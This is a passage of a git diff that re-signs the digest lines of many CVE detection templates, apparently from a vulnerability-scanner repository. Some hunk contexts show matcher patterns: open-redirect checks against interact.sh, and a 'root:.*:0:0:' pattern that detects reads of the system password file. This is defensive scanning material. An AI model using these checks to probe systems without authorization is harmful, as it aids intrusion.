http/cves/2023/CVE-2023-48084.yaml | 2 +- http/cves/2023/CVE-2023-49070.yaml | 2 +- http/cves/2023/CVE-2023-49103.yaml | 2 +- http/cves/2023/CVE-2023-4966.yaml | 2 +- http/cves/2023/CVE-2023-4973.yaml | 2 +- http/cves/2023/CVE-2023-4974.yaml | 2 +- http/cves/2023/CVE-2023-49785.yaml | 2 +- http/cves/2023/CVE-2023-5003.yaml | 2 +- http/cves/2023/CVE-2023-50290.yaml | 2 +- http/cves/2023/CVE-2023-5074.yaml | 2 +- http/cves/2023/CVE-2023-5089.yaml | 2 +- http/cves/2023/CVE-2023-50917.yaml | 2 +- http/cves/2023/CVE-2023-50968.yaml | 2 +- http/cves/2023/CVE-2023-51467.yaml | 2 +- http/cves/2023/CVE-2023-52085.yaml | 2 +- http/cves/2023/CVE-2023-5244.yaml | 2 +- http/cves/2023/CVE-2023-5360.yaml | 2 +- http/cves/2023/CVE-2023-5375.yaml | 2 +- http/cves/2023/CVE-2023-5556.yaml | 2 +- http/cves/2023/CVE-2023-5830.yaml | 2 +- http/cves/2023/CVE-2023-5914.yaml | 2 +- http/cves/2023/CVE-2023-5991.yaml | 2 +- http/cves/2023/CVE-2023-6018.yaml | 2 +- http/cves/2023/CVE-2023-6020.yaml | 2 +- http/cves/2023/CVE-2023-6021.yaml | 2 +- http/cves/2023/CVE-2023-6023.yaml | 2 +- http/cves/2023/CVE-2023-6038.yaml | 2 +- http/cves/2023/CVE-2023-6063.yaml | 2 +- http/cves/2023/CVE-2023-6065.yaml | 2 +- http/cves/2023/CVE-2023-6114.yaml | 2 +- http/cves/2023/CVE-2023-6360.yaml | 2 +- http/cves/2023/CVE-2023-6379.yaml | 2 +- http/cves/2023/CVE-2023-6380.yaml | 2 +- http/cves/2023/CVE-2023-6389.yaml | 2 +- http/cves/2023/CVE-2023-6553.yaml | 2 +- http/cves/2023/CVE-2023-6567.yaml | 2 +- http/cves/2023/CVE-2023-6623.yaml | 2 +- http/cves/2023/CVE-2023-6634.yaml | 2 +- http/cves/2023/CVE-2023-6831.yaml | 2 +- http/cves/2023/CVE-2023-6875.yaml | 2 +- http/cves/2023/CVE-2023-6895.yaml | 2 +- http/cves/2023/CVE-2023-6909.yaml | 2 +- http/cves/2023/CVE-2023-6977.yaml | 2 +- http/cves/2023/CVE-2023-6989.yaml | 2 +- http/cves/2023/CVE-2023-7028.yaml | 2 +- http/cves/2024/CVE-2024-0195.yaml | 2 +- http/cves/2024/CVE-2024-0200.yaml | 2 +- http/cves/2024/CVE-2024-0204.yaml | 2 +- http/cves/2024/CVE-2024-0235.yaml | 2 +- http/cves/2024/CVE-2024-0305.yaml | 2 +- http/cves/2024/CVE-2024-0337.yaml | 2 +- http/cves/2024/CVE-2024-0352.yaml | 2 +- http/cves/2024/CVE-2024-0713.yaml | 2 +- http/cves/2024/CVE-2024-1021.yaml | 2 +- http/cves/2024/CVE-2024-1071.yaml | 2 +- http/cves/2024/CVE-2024-1208.yaml | 2 +- http/cves/2024/CVE-2024-1209.yaml | 2 +- http/cves/2024/CVE-2024-1210.yaml | 2 +- http/cves/2024/CVE-2024-1561.yaml | 2 +- http/cves/2024/CVE-2024-1709.yaml | 2 +- http/cves/2024/CVE-2024-20767.yaml | 2 +- http/cves/2024/CVE-2024-21644.yaml | 2 +- http/cves/2024/CVE-2024-21645.yaml | 2 +- http/cves/2024/CVE-2024-21683.yaml | 2 +- http/cves/2024/CVE-2024-21887.yaml | 2 +- http/cves/2024/CVE-2024-21893.yaml | 2 +- http/cves/2024/CVE-2024-22024.yaml | 2 +- http/cves/2024/CVE-2024-22319.yaml | 2 +- http/cves/2024/CVE-2024-22927.yaml | 2 +- http/cves/2024/CVE-2024-2340.yaml | 2 +- http/cves/2024/CVE-2024-23917.yaml | 2 +- http/cves/2024/CVE-2024-24131.yaml | 2 +- http/cves/2024/CVE-2024-24919.yaml | 2 +- http/cves/2024/CVE-2024-25735.yaml | 2 +- http/cves/2024/CVE-2024-26331.yaml | 2 +- http/cves/2024/CVE-2024-27198.yaml | 2 +- http/cves/2024/CVE-2024-27956.yaml | 2 +- http/cves/2024/CVE-2024-28255.yaml | 2 +- http/cves/2024/CVE-2024-28734.yaml | 2 +- http/cves/2024/CVE-2024-2879.yaml | 2 +- http/cves/2024/CVE-2024-29059.yaml | 2 +- http/cves/2024/CVE-2024-29269.yaml | 2 +- http/cves/2024/CVE-2024-3097.yaml | 2 +- http/cves/2024/CVE-2024-3136.yaml | 2 +- http/cves/2024/CVE-2024-31848.yaml | 2 +- http/cves/2024/CVE-2024-31849.yaml | 2 +- http/cves/2024/CVE-2024-31850.yaml | 2 +- http/cves/2024/CVE-2024-32399.yaml | 2 +- http/cves/2024/CVE-2024-3273.yaml | 2 +- http/cves/2024/CVE-2024-33575.yaml | 2 +- http/cves/2024/CVE-2024-33724.yaml | 2 +- http/cves/2024/CVE-2024-3400.yaml | 2 +- http/cves/2024/CVE-2024-4040.yaml | 2 +- http/cves/2024/CVE-2024-4348.yaml | 2 +- 1814 files changed, 1814 insertions(+), 1814 deletions(-) diff --git a/http/cves/2000/CVE-2000-0114.yaml b/http/cves/2000/CVE-2000-0114.yaml index 721f26cc51..913da2da7b 100644 --- a/http/cves/2000/CVE-2000-0114.yaml +++ b/http/cves/2000/CVE-2000-0114.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f18bd6804b42bce98cc02cea3261854e17f9d58bcb7034e2dc7289c456c57c0d022100d91840b613c0b2544a15e2ae802e176fea630dee4788fe64c5e40f9082bc1374:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205feaaedc7212d5546b4a1e2b1f6d701d77390a9a19a31d6f45a9150b0da0080a02203ffb16ad768f80c2d873647321189e4c6fa3eff77f84fbc18a3d04d5b7c714f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2001/CVE-2001-0537.yaml b/http/cves/2001/CVE-2001-0537.yaml index b05800361d..8470e08000 100644 --- a/http/cves/2001/CVE-2001-0537.yaml +++ b/http/cves/2001/CVE-2001-0537.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201530427f983f1ac47d92a3e00fb141fab33efd4f9ac109b29beca3488669ca5b022100e7ab1cc3fec5da235092a57848d0f83403d81bff12d5ed347ee7d6442b19444c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dcd27cbb0d1546b2d94f702f5298cdf445b5fcea29d9741ab30cdedd59749c2f022009e09962e874a528aea693b7c0c3984cf75ac175451d01bf66ae6a6d6d9f7e75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2002/CVE-2002-1131.yaml b/http/cves/2002/CVE-2002-1131.yaml index 872aa5b0f5..0422de46ab 100644 --- a/http/cves/2002/CVE-2002-1131.yaml +++ b/http/cves/2002/CVE-2002-1131.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200f73612464ffbb40fb37890f6902c59fd670a8c57eb10a297b6ce6d7d7a68301022100a8ed74ff2523575fbbdb8d5a4a330d69c6a96ef8d97d911a20c1468dfa92aa2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022079f74e17066a8030a2ff5a3ea6fa4258ba6ec59353823c400a4f933c88b091020220765e9a7f5973726aebe82162e0dc3565fd9f7f6fa15e4f417d5bdd2c0696de1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2004/CVE-2004-1965.yaml b/http/cves/2004/CVE-2004-1965.yaml index 6da7d480f3..bed100152f 100644 --- a/http/cves/2004/CVE-2004-1965.yaml +++ b/http/cves/2004/CVE-2004-1965.yaml @@ -40,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4a0a0047304502200942a34b2650323617b6c0a05aed0e60c5452d3b77477cfa2760dd51678d7371022100cf0d486cba6f8042c311e7cc3134723dd8e8b86ff44b5cdb22e0adbfe3ba3776:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ed72c7aac1f09f263022943f85c3438ab7bc9d157d128cbef2639c033ff4162802207254eabebe6585d83a8abb17a6163edc0de13410f5bfc937fda5bd940a22f36e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2005/CVE-2005-3344.yaml b/http/cves/2005/CVE-2005-3344.yaml index 18423be5d9..5bf2bf72f8 100644 --- a/http/cves/2005/CVE-2005-3344.yaml +++ b/http/cves/2005/CVE-2005-3344.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200f6ab7e5b811ae50b7feb5a05fd7996c735219dbe8a152b9c4cfd263af7405d6022054184a20298d9717f3c6263e0ca1083caa2941df71af109b0f69013ab683cec8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b73417184338a145cd434067c3a5affab5f19d715ddcf840193794038d2fe9fc022100ad8926c7c03251c1cf3ed73d9a65bb5c3bee39ea572aad309043f945c6e6f935:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2005/CVE-2005-3634.yaml b/http/cves/2005/CVE-2005-3634.yaml index 0096019484..cf64ff3ab9 100644 --- a/http/cves/2005/CVE-2005-3634.yaml +++ b/http/cves/2005/CVE-2005-3634.yaml @@ -43,4 +43,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4b0a004830460221009b702e9a18c644f2a8ddd637cd2d87e35e59ec9159e4726e5b9dbf6cbe27ddcc022100e7fd499cc594ceab440e9188af24fd6eaa6f1eab4514609586796ae41b96b43f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220782d2b8bf481a5915e9c1718c67324b49b8433b1210b910742cd305d0111df63022100840add217ef0fb886c242f1eb329ce349c23c94430c6ec8a74e9f1c887447cc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2006/CVE-2006-2842.yaml b/http/cves/2006/CVE-2006-2842.yaml index e395c6e2c0..4cc42895e6 100644 --- a/http/cves/2006/CVE-2006-2842.yaml +++ b/http/cves/2006/CVE-2006-2842.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204e83bd6e716c336c1660d900f8c08653ace9865180909e88dc35b6180af0634d02205959ac5c89fa3aa04db1f64a614848f8a84c0604fe7f72bad1f63b1c99d8404b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022046dd195f5bf5c276dfb90ef3d9f60f781ae43dab2e02f44963a570ff60e6ea73022001f681cdc292f9f50598231358201650a5333381d856d0c35452e7a9acd3f29a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-0885.yaml b/http/cves/2007/CVE-2007-0885.yaml index 6c0e74c380..6035d8bab5 100644 --- a/http/cves/2007/CVE-2007-0885.yaml +++ b/http/cves/2007/CVE-2007-0885.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200ed59822b672884f4e50ef40df983fb0862418cede91f6dc96f764425e4bf4e302205b376b90e98b64ced2421151d9636a14d0dd0830c2dee682c77cda12c602e7f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205ece81e3272a6b93437d5876ec0f1346da324d72a43381b3fd9caca99c4051ad022100e4e03ce4d101a0b9f4fb82a0e85ad58d1ee55d277fb6a190888bb16b1dddb1c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-3010.yaml b/http/cves/2007/CVE-2007-3010.yaml index df6e5d5321..913a3cbfcd 100644 --- a/http/cves/2007/CVE-2007-3010.yaml +++ b/http/cves/2007/CVE-2007-3010.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100860fb5fb6459c546fd88f49a316826632cf5a5f32bc9e9a5ce27dce40d150997022100b0b9ecb0467a3de0631a06e2e867b73844a98e132eef931105650d75e196e26f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022077daea5464ae2c99ee724324391edfccb837ce48fc24759bfc0a8aff476eefe8022063a85e8dfe57da9183ac569780803037bd4ac032588a70173d036f1660ae7caa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-4504.yaml b/http/cves/2007/CVE-2007-4504.yaml index 90debd42bc..08115cea39 100644 --- a/http/cves/2007/CVE-2007-4504.yaml +++ b/http/cves/2007/CVE-2007-4504.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207688a03699896a3d8c9a6254539a13ace8813096112296d102ca74fc45a0f17b022036a518c6e517befe270990e5d1a9d992f8b19f1fa36086546a11b544ff84c692:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fa8b85892e423c5bf35a3d7e57c7a6c92369087bccf959a8ad7952dc814ddd64022100e94750ab323e456ccb7dc737ab126a2d5c160b7190e3e70993be80dd1064a3b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-4556.yaml b/http/cves/2007/CVE-2007-4556.yaml index baf5a3a9e8..10f8f1198a 100644 --- a/http/cves/2007/CVE-2007-4556.yaml +++ b/http/cves/2007/CVE-2007-4556.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022037e628251b17abd8fa644b564dab5c21ed475158752e510f311df96b9d63497402201bb1673e45a11edc53bdf0a83147c1a87a74c36358ede8fe0f576850c4d4900b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203c4a8474be81263c4f0abab1f0fe57a6779f4cb1d748445fd08dc0dfab5c7131022060ca2bf20c392063d8c3f8c9e03e130f0aec84067f9af1e94c168c914dc21f7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-5728.yaml b/http/cves/2007/CVE-2007-5728.yaml index b69164999f..45c71789e7 100644 --- a/http/cves/2007/CVE-2007-5728.yaml +++ b/http/cves/2007/CVE-2007-5728.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022070fd863c2346a1262a1c6a87c2bf86b8a29a953f0bb6e8e24b6988aef07dcdde022100de1eb0f49138ab29c4ba04a2020fb9075ad7b3e9c9f82629d21eee375c325b40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100be74cafeaf1d2052ae0a174926f0ffe1b73654dc73480253d26a6251d5a9f639022008e2f87389adf996c0386c4484fc3c007a8584f746fd2fc854c5d12bcd997ff1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-1061.yaml b/http/cves/2008/CVE-2008-1061.yaml index a08f7e1a9d..929c258686 100644 --- a/http/cves/2008/CVE-2008-1061.yaml +++ b/http/cves/2008/CVE-2008-1061.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220777bd4294b2dc57575646d8dc88fd119dc51c0d25f2086f36a7cdefefe5647e7022100df472d5c3da8f1e15e7c99529215af99987384e58c92d925163f10813a236e5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009752c4040553333fe8225f67c3bc673afda408ff88de0319cd2b4a0bd4e7333f0220229dc9371a4b7635f2215c334754bca5387a8624d5a5f7f9476a21049803b04b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-1547.yaml b/http/cves/2008/CVE-2008-1547.yaml index 74805a9031..1b24dd80bf 100644 --- a/http/cves/2008/CVE-2008-1547.yaml +++ b/http/cves/2008/CVE-2008-1547.yaml @@ -45,4 +45,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4b0a00483046022100add61103f83105e6e0184e371a84b94bef42e3e534eec0ba3c444c81e603b7df022100c59d3962095aa5e3dc9897e04b109f9407889fe544bd9737d9675a3b767dc339:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210080e5ce4002e9f78ace8bc34bbc70638c4d349900438da431a2757afcb531657002203ab47f7e35668fdae30c9a1dd0dabb91bae39cfafb7a502764f1517d3e3aa8e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-2650.yaml b/http/cves/2008/CVE-2008-2650.yaml index ba625d56d3..005162de9f 100644 --- a/http/cves/2008/CVE-2008-2650.yaml +++ b/http/cves/2008/CVE-2008-2650.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e337afcba9ba8a3b54040f339305e5467dbb5fda18b50da4f493484a5c5182d2022100e24c3017a7abcd267ab66ab6e255d1ed5ea56d71492bcb6afd58d3a093e618c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022003b63e7cd7ab09897735b1866b0ce2b3aedc493e01965112604d9981a58d09fe02200db2d75ecbfa5669fc8cc988fcf93ee338fa4d396b07f4d60bb219df3cd58bc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-4764.yaml b/http/cves/2008/CVE-2008-4764.yaml index 05e6784266..5b784a3beb 100644 --- a/http/cves/2008/CVE-2008-4764.yaml +++ b/http/cves/2008/CVE-2008-4764.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220233b1d67c643f2b04cc98635c1308c7fc6957ca19112156b50312a3c02301dd7022062edfca4c36a26a476f2dcbf466e092d2e1d048bd645dff71dbb23bb91ff5af5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210083dfc3a90c4bb3aaa2d1d85bd0eb23154e4019210fc591e51f0bded1afc7a70202205d2c129a1bb23b903372e64284d8830eabe2e9eb96e0eb5afa05c6d444afc686:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-5587.yaml b/http/cves/2008/CVE-2008-5587.yaml index dd7008fd98..71ba384ff2 100644 --- a/http/cves/2008/CVE-2008-5587.yaml +++ b/http/cves/2008/CVE-2008-5587.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fb4daa9c228b923a61c5e11388e2e42c7b6505fe615664172911ca0429dd5ff8022077c9aa14bb0dfd6d7e046e8bce05a14403d5f060388baa3c9df3ae42469cdb77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100912e1228880396cbbedb45de0a602506bea640e6cd8aaa621d0ec6707414e7c30220267eb7b0e7a3731120937298835fa180c09e4f109d5ef5a053292b64c87d6af7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6080.yaml b/http/cves/2008/CVE-2008-6080.yaml index 1516da4d0f..832d03e02f 100644 --- a/http/cves/2008/CVE-2008-6080.yaml +++ b/http/cves/2008/CVE-2008-6080.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205ae540f2d6cbc68c64570307fdf0bdf36a2b7acd80b4eee7f37e87fe1a215408022001a5e8067cb4740653e558dcafa619df1481f916f8dddb073b404630e6703a24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100880770c9a32ddd553b05d2f87d9b1b190a6c3a88dfa481015ce830ac8d7f2088022073a2283b069da137fa2a4d8f3b411949d3f0d45110008d393a0cf2862f3cb013:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6172.yaml b/http/cves/2008/CVE-2008-6172.yaml index 428278c7bc..f9c097ff68 100644 --- a/http/cves/2008/CVE-2008-6172.yaml +++ b/http/cves/2008/CVE-2008-6172.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c60015398304f9ce817dba9913fa3eea08043b9830cef5a4e1baeaadb99b5a0c022100d34a8d77d912dc1372e761e3ea0d4ccda3e9bcacddb4dd58752f9c53d81c8048:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bb9dc7da389c238f3d1f51bb8eb60df5e0b9eb7c3e2613a47e3d8535a0cd36050220650d1c196b18deeb192b1c50fdffed8b36fd4412bac34a17359e495325382166:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6222.yaml b/http/cves/2008/CVE-2008-6222.yaml index ccaa6b1020..13e2bf3692 100644 --- a/http/cves/2008/CVE-2008-6222.yaml +++ b/http/cves/2008/CVE-2008-6222.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202a6b3c7843f9b11700d264ebe9e7d62ab4a3218e9f4b692e8ebb15b025cb36a70221008873d32a32de8df6cd215ab066f2fb7847612833f7b326d8d4cc071bbc0a043a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210085ba6f15c447dffc76deb881a79fa4f92f8beb9255635e3a753f2cffcfc1dbbd022100d607c5f2aeba0c92069b3518cab335995771aa173ec4a1ed40c49cec8b43ec58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6465.yaml b/http/cves/2008/CVE-2008-6465.yaml index 2130f00493..213d660b5b 100644 --- a/http/cves/2008/CVE-2008-6465.yaml +++ b/http/cves/2008/CVE-2008-6465.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200fe7f64211b0ac14e48925d06d09a65070632e86c47843b9217a84320880330d022078feaff899b6d7e68e8cc85f5dbbc923969ec1a18c3259c0bcea48559cd82b1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022003fe39b5f5c4f14f5a4304fb88ee5233a61a6c4f8320e5ed5ed9cebf70ec20700220790cbb99fc446d59496ddf0e749f6c03fd0d0f9063d1d14442acabade84e4da0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6668.yaml b/http/cves/2008/CVE-2008-6668.yaml index 79568e3231..b1e76a79a3 100644 --- a/http/cves/2008/CVE-2008-6668.yaml +++ b/http/cves/2008/CVE-2008-6668.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022060c84de88a71ccf8b996bea22ac6b62a2e003d9b3b8689c2d617d3e2f1ad99bc02202c59470b8795792f83ecbf5e7c7b37395db50a218f420b0fa76f2accc49d815f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210093d53a44e7670ae91340f32f011a1cf3d1a356b259d38839794f5af89b77d20802200ece4f4130a9a1e17e778ea393395611a46cc9af56a222985f4e148afc9159e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-7269.yaml b/http/cves/2008/CVE-2008-7269.yaml index 4f4712280f..bef38ec236 100644 --- a/http/cves/2008/CVE-2008-7269.yaml +++ b/http/cves/2008/CVE-2008-7269.yaml @@ -39,4 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a00473045022100ffdf11249d57dd33b3a45982e01655bacfcd643a4c57e97aa5f891243557c3b202205fd36fccfd2f9c9afdec7d8b8b4463ac9a1d07a52b558de7a68f374cbc5bc3ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b344e52e7ae31d77fb3af98c4d5022974a0aae7db6fa748c2ead62c71aa1f2ad0221009db6268e719957315f53a9c94d7d9bcce96fdca4bd6a7197b85d1bed428969a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-0545.yaml b/http/cves/2009/CVE-2009-0545.yaml index 986b065cd7..38d58ade0c 100644 --- a/http/cves/2009/CVE-2009-0545.yaml +++ b/http/cves/2009/CVE-2009-0545.yaml @@ -42,4 +42,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 4b0a00483046022100b390e617f8d9be114aea50840c529aab08fac1822e4dece7746cb7733a409631022100b30c36b38ea49931b16615862de2267a59370daf662b7e77c88b25add453fb8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210086897c4a89ba3180b412adb9e2515a6dc81be03c34ce7b8c4f7059efc87adb38022075f0afa4057f34ad3b734c8a7d4fcd6fb8c7adf9ff68351baf948f2ecce764bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-0932.yaml b/http/cves/2009/CVE-2009-0932.yaml index 52f5de7570..24bc9aaba4 100644 --- a/http/cves/2009/CVE-2009-0932.yaml +++ b/http/cves/2009/CVE-2009-0932.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220752ee73ce2196cc54c39a5e60377c58c87e7ef7ef489fd990d2b463b6ddd900402204885ac378662f0bf728920184aab940b6d54ebdb022e1767ebc9b7e4283d8ad1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100edfe0bfde8e2accddd711cbcb56d79be3056b26669bafe2f3b6cb9a91913a64002202d6da59dfba62472076866b6bd692f3639a1ffade4e7b4445cc2e3e12db22ebe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-1151.yaml b/http/cves/2009/CVE-2009-1151.yaml index acd906e9bd..a5a63a7618 100644 --- a/http/cves/2009/CVE-2009-1151.yaml +++ b/http/cves/2009/CVE-2009-1151.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d034c615116d4e4388066b8ecd70006fb486a97f1893f14acdd83c4b1d48a2ec02200b87edb8aa8815371b589ebc0773ca1f591ef511e9f6dfb2c4a6bdc6cfc624f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bcb661005ec46d39a8b90cca079e6e94bcdfcd7cc10b0b4b21a007623a914cdc02200aedd6c2f81799c703ef979fe9ab6d86b014ea31fb9ae6c244b1688f3248ac39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-1872.yaml b/http/cves/2009/CVE-2009-1872.yaml index a1fcfebec4..7bc7dbdd0a 100644 --- a/http/cves/2009/CVE-2009-1872.yaml +++ b/http/cves/2009/CVE-2009-1872.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210099e04590b72f5f59dff9760d627e7042601a45b16bea2c23852fa76186fae5ab0220361a0788e7674d6ed82b5e924aace4e3d604f237ac2666fa79b1e91830fd2e1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203366821ed2b22b2b05bab6a493a7c7c5db231fd6a6d80f9202908b447721a0b3022100dcfc043de885b54179a0e02dfbb7a4e986a33db1f9ef2f0cbd346b21ba783e65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-2100.yaml b/http/cves/2009/CVE-2009-2100.yaml index 3ba409999f..6f8dab2a39 100644 --- a/http/cves/2009/CVE-2009-2100.yaml +++ b/http/cves/2009/CVE-2009-2100.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220011b812bacaed12772d45c7485d04136e35b9196b4c435b488601681c7bb3be50220722ab9dd33d98de09bfaec078bfd702692da5772714e412426ee37084ac9b862:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100868c8dad66aea364683d9a4e38139c1e040c1cb3b792e827191f2b16824d29ea0220642e61d2850862c9a2dc3795c395d80f33aa951bcfc657a88eec1aa9cf9a1c60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-3318.yaml b/http/cves/2009/CVE-2009-3318.yaml index f77378d2c4..e38cbd12d9 100644 --- a/http/cves/2009/CVE-2009-3318.yaml +++ b/http/cves/2009/CVE-2009-3318.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bc8b6fb22e490512109118ecf32279b8742eb0391a184c91700c91da8b4591eb022100c82312184befa6261e4804c856191e828d49e06fd6f09184837202906a4f1d4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008ae69089dedcbf57111b3c504146d466dfe72254c0dd6fc4e377fe1d00b5ffec02200249cdd3548781a034d4e37670e19c65011269b24a6d1e24b2347a071823c5ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-4202.yaml b/http/cves/2009/CVE-2009-4202.yaml index a9b7cb0a0e..1968203952 100644 --- a/http/cves/2009/CVE-2009-4202.yaml +++ b/http/cves/2009/CVE-2009-4202.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202c777774f99408aa53f9024ed173c4b5f653295367409e9b42c256336d3a3ad4022100ea93147fd00a0eba5c9c1ff6e8a48bba81f4df36c20ecf450a8a67a0b887c5cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 